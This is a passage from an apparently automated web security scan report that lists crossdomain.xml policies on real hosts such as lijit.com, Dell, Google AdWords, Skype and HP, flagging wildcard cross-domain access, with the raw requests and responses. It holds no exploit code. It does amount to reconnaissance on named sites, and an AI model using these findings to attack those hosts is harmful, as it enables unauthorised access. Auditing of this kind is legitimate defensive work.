GET /crossdomain.xml HTTP/1.0
Host: vap1iad2.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:58 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 18 Aug 2011 23:49:34 GMT
ETag: "e7efc-83-4aad043c8df80"
Accept-Ranges: bytes
Content-Length: 131
Cache-Control: must-revalidate
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.37. http://vap1sfo1.lijit.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vap1sfo1.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: vap1sfo1.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:51 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 18 Aug 2011 23:50:28 GMT
ETag: "b6f8a-83-4aad04700d900"
Accept-Ranges: bytes
Content-Length: 131
Cache-Control: must-revalidate
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.38. http://vap2den1.lijit.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vap2den1.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: vap2den1.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:31:26 GMT
Server: Apache
Last-Modified: Thu, 18 Aug 2011 22:28:06 GMT
ETag: "e0619-83-4aacf206fe980"
Accept-Ranges: bytes
Content-Length: 131
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.39. http://vap2iad1.lijit.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vap2iad1.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: vap2iad1.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:34:26 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 18 Aug 2011 23:49:04 GMT
ETag: "a559f-83-4aad041ff1c00"
Accept-Ranges: bytes
Content-Length: 131
Cache-Control: must-revalidate
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.40. http://vap3den1.lijit.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vap3den1.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: vap3den1.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:34:05 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 18 Aug 2011 22:29:05 GMT
ETag: "122831-83-4aacf23f74ab7"
Accept-Ranges: bytes
Content-Length: 131
Cache-Control: must-revalidate
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.41. http://www.cymphonix.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cymphonix.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cymphonix.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:07 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Tue, 06 Jan 2009 07:09:52 GMT
ETag: "30d8758-69-17f87000"
Accept-Ranges: bytes
Content-Length: 105
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.42. http://www.xg4ken.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.xg4ken.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.xg4ken.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:46:32 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 21 Dec 2009 22:59:19 GMT
ETag: "35800d-c6-47b450a15bfc0"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.43. http://accessories.us.dell.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: accessories.us.dell.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 28 May 2009 18:43:47 GMT
Accept-Ranges: bytes
ETag: "2747823cc4dfc91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:05 GMT
Connection: close
Content-Length: 364

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.dell.com -->
<cross-domain-policy>
<allow-access-from domain="*.dell.com" />
<allow-access-from domain="*.coltas.com" />
<allow-access-from domain="*.triaddigital.com" />
...[SNIP]...

4.44. https://adwords.google.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adwords.google.com

Response

HTTP/1.0 200 OK
Expires: Mon, 05 Sep 2011 16:28:57 GMT
Date: Sun, 04 Sep 2011 16:28:57 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.45. http://blogs.skype.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: blogs.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:05:34 GMT
Server: Apache/2.2.0 (Fedora)
Last-Modified: Wed, 21 Apr 2010 18:34:22 GMT
ETag: "42ce4b-173-484c371592780"
Accept-Ranges: bytes
Content-Length: 371
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>    
<allow-access-from domain="*.skype.com" />
<allow-access-from domain="*.skype.net" />
<allow-access-from domain="*.skype.test"/>
...[SNIP]...

4.46. http://content-cdn.dell.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://content-cdn.dell.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: content-cdn.dell.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 26 Aug 2010 17:13:28 GMT
ETag: "2d593b04245cb1:0"
P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI "
Date: Sun, 04 Sep 2011 16:19:08 GMT
Content-Length: 270
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.dell.com -->
<cross-domain-policy>


...[SNIP]...
<allow-access-from domain="*.dell.com" />
...[SNIP]...

4.47. http://content.dell.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://content.dell.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.dell.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 26 Aug 2010 17:13:28 GMT
Accept-Ranges: bytes
ETag: "2d593b04245cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI "
Date: Sun, 04 Sep 2011 16:19:09 GMT
Connection: close
Content-Length: 270

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.dell.com -->
<cross-domain-policy>


...[SNIP]...
<allow-access-from domain="*.dell.com" />
...[SNIP]...

4.48. http://disqus.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://disqus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: disqus.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:38 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Connection: close
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.usopen.org" to-ports="80,96" secure="false" />
...[SNIP]...

4.49. http://embed.technorati.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://embed.technorati.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: embed.technorati.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 05:29:04 GMT
Server: Apache
Last-Modified: Thu, 29 Oct 2009 01:09:39 GMT
ETag: "1d5c40-14f-4770890c33ac0"
Accept-Ranges: bytes
Content-Length: 335
Content-Type: text/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.technorati.com" />
<allow-access-from domain="technorati.whsites.net" />
<allow-access-from domain="convoad.technoratimedia.com" />
...[SNIP]...

4.50. http://h30415.www3.hp.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://h30415.www3.hp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: h30415.www3.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:32:33 GMT
Server: Apache/2.2.17 (Unix) Resin/3.1.6
Last-Modified: Sat, 17 May 2008 20:24:00 GMT
ETag: "556e68-469-44d72e9257800"
Accept-Ranges: bytes
Content-Length: 1129
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="feedroom.speedera.net" />
<allow-access-from domain="qa.www.feedroom.com" />
<allow-access-from domain="*.feedroom.com" />
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="downloads.feedroom.com" />
   <allow-access-from domain="*.downloads.feedroom.com" />
   <allow-access-from domain="*.lw-player.feedroom.com" />
   <allow-access-from domain="*.canoe.com" />
   <allow-access-from domain="*.canoe.com.edgesuite.net" />
   <allow-access-from domain="*.usatoday.com" />
   <allow-access-from domain="*.nymag.com" />
   <allow-access-from domain="*.canoe.ca" />
   <allow-access-from domain="*.hsus.org" />
<allow-access-from domain="*.temel.com"/>
<allow-access-from domain="*.curiousmedia.com"/>
<allow-access-from domain="*.odopod.com"/>
...[SNIP]...

4.51. http://h30507.www3.hp.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://h30507.www3.hp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: h30507.www3.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:32:33 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Wed, 31 Aug 2011 09:01:47 GMT
ETag: "1821c2d-1d0-4abc960c2d4c0"
Accept-Ranges: bytes
Content-Length: 464
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mast
...[SNIP]...
<allow-access-from domain="h41112.www4.hp.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false" />
...[SNIP]...

4.52. http://h41131.www4.hp.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://h41131.www4.hp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: h41131.www4.hp.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
ETag: "1079908203"
Last-Modified: Wed, 21 Oct 2009 08:26:38 GMT
Server: lighttpd
Content-Length: 642
Date: Sun, 04 Sep 2011 16:32:35 GMT
X-Varnish: 766108063
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*.hp.com" />
   <allow-access-from domain="*.21torr.com" />
   <allow-access-from domain="*.google.*" />
   <allow-access-from domain="*.gmodules.*" />
   <allow-access-from domain="*.seitenschwung.de" />
<allow-access-from domain="*.seitenschwung.de/21T" />
...[SNIP]...

4.53. http://i.dell.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://i.dell.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: i.dell.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 24 Jun 2010 19:18:24 GMT
ETag: "040eb3d213cb1:0"
Date: Sun, 04 Sep 2011 16:19:15 GMT
Content-Length: 1152
Connection: close
Cache-Control: public, max-age=604800

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.dell.com -->
<cross-domain-
...[SNIP]...
<allow-access-from domain="*.dell.com"/>
<allow-access-from domain="*.coltas.com"/>
<allow-access-from domain="*.dellpartnerdirect.com"/>
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atdmt.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.yr.ca"/>
<allow-access-from domain="services.gizmo.com.au" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="*.twitter.com" />
<allow-access-from domain="*.radian6.com" />
<allow-access-from domain="*.ideastorm.com" />
<allow-access-from domain="*.flickr.com" />
...[SNIP]...

4.54. http://lt.dell.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://lt.dell.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: lt.dell.com

Response

HTTP/1.1 200 OK
Content-Length: 942
Content-Type: text/xml
Last-Modified: Thu, 18 Feb 2010 21:01:46 GMT
Accept-Ranges: bytes
ETag: "bf15fe94ddb0ca1:ed9"
X-Powered-By: ASP.NET
Server: Unauthorized-Use-Prohibited
Date: Sun, 04 Sep 2011 16:18:55 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.dell.com -->
<cross-domain-
...[SNIP]...
<allow-access-from domain="*.dell.com"/>
<allow-access-from domain="*.coltas.com"/>
<allow-access-from domain="*.dellpartnerdirect.com"/>
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atdmt.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.yr.ca"/>
<allow-access-from domain="services.gizmo.com.au" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.facebook.com" />
...[SNIP]...

4.55. http://pagead2.googlesyndication.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request